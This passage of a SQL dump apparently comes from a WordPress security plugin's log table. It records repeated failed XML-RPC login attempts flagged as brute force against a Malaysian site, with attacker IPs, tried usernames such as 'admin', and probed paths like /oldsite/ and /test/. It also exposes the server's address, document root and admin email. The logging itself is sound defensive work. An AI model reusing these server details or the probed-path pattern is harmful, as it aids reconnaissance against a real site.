2/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRF8g0@TGWC-1tzGX5fZgAAAI4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852594.8355\";s:12:\"REQUEST_TIME\";s:10:\"1566852594\";}}','notice','2019-08-26 20:49:57','2019-08-26 20:49:55',18320072,19602376,'http://bintara.com.my/wp2/xmlrpc.php',1,0,'69.89.31.84'),(23276,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/store/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"360\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/store/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/store/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRF8h90bn5mtr-PXqq4zQAAAE4\";s:12:\"REDIRECT_URL\";s:17:\"/store/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"104.171.4.183\";s:11:\"REMOTE_PORT\";s:5:\"50946\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/store/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:17:\"/store/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRF8h90bn5mtr-PXqq4zQAAAE4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852594.2025\";s:12:\"REQUEST_TIME\";s:10:\"1566852594\";}}','notice','2019-08-26 20:49:57','2019-08-26 20:49:54',18317584,19599952,'http://bintara.com.my/store/xmlrpc.php',1,0,'104.171.4.183'),(23275,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/oldsite/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"338\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/oldsite/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/oldsite/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRF7h90bn5mtr-PXqq4yAAAAEk\";s:12:\"REDIRECT_URL\";s:19:\"/oldsite/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"202.92.4.47\";s:11:\"REMOTE_PORT\";s:5:\"38896\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/oldsite/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:19:\"/oldsite/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRF7h90bn5mtr-PXqq4yAAAAEk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852590.5313\";s:12:\"REQUEST_TIME\";s:10:\"1566852590\";}}','notice','2019-08-26 20:49:54','2019-08-26 20:49:50',18308736,19509328,'http://bintara.com.my/oldsite/xmlrpc.php',1,0,'202.92.4.47'),(23274,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/new/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"360\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRF7x90bn5mtr-PXqq4yQAAAEw\";s:12:\"REDIRECT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"50.62.208.183\";s:11:\"REMOTE_PORT\";s:5:\"41875\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRF7x90bn5mtr-PXqq4yQAAAEw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852591.9277\";s:12:\"REQUEST_TIME\";s:10:\"1566852591\";}}','notice','2019-08-26 20:49:54','2019-08-26 20:49:52',18306600,19508544,'http://bintara.com.my/new/xmlrpc.php',1,0,'50.62.208.183'),(23273,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"359\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRF5RTEVi0fEJEHuDZaZwAAAA0\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"184.168.193.6\";s:11:\"REMOTE_PORT\";s:5:\"34496\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRF5RTEVi0fEJEHuDZaZwAAAA0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852581.8596\";s:12:\"REQUEST_TIME\";s:10:\"1566852581\";}}','notice','2019-08-26 20:49:43','2019-08-26 20:49:42',18305472,19504272,'http://bintara.com.my/test/xmlrpc.php',1,0,'184.168.193.6'),(23272,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/oldsite/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"360\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/oldsite/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/oldsite/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRF2xTEVi0fEJEHuDZaXgAAAA8\";s:12:\"REDIRECT_URL\";s:19:\"/oldsite/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"14.162.145.182\";s:11:\"REMOTE_PORT\";s:5:\"23254\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/oldsite/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:19:\"/oldsite/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRF2xTEVi0fEJEHuDZaXgAAAA8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852571.1021\";s:12:\"REQUEST_TIME\";s:10:\"1566852571\";}}','notice','2019-08-26 20:49:33','2019-08-26 20:49:31',18309808,19512200,'http://bintara.com.my/oldsite/xmlrpc.php',1,0,'14.162.145.182'),(23271,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/oldsite/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/oldsite/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/oldsite/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRF2xTEVi0fEJEHuDZaXwAAAAE\";s:12:\"REDIRECT_URL\";s:19:\"/oldsite/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"74.220.219.119\";s:11:\"REMOTE_PORT\";s:5:\"31435\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/oldsite/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:19:\"/oldsite/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRF2xTEVi0fEJEHuDZaXwAAAAE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852571.2491\";s:12:\"REQUEST_TIME\";s:10:\"1566852571\";}}','notice','2019-08-26 20:49:33','2019-08-26 20:49:31',18305008,19506328,'http://bintara.com.my/oldsite/xmlrpc.php',1,0,'74.220.219.119'),(23270,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"359\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRF1xTEVi0fEJEHuDZaWwAAABg\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"81.27.97.52\";s:11:\"REMOTE_PORT\";s:5:\"49401\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRF1xTEVi0fEJEHuDZaWwAAABg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566852567.677\";s:12:\"REQUEST_TIME\";s:10:\"1566852567\";}}','notice','2019-08-26 20:49:29','2019-08-26 20:49:28',18306520,19508600,'http://bintara.com.my/test/xmlrpc.php',1,0,'81.27.97.52'),(23269,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"359\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0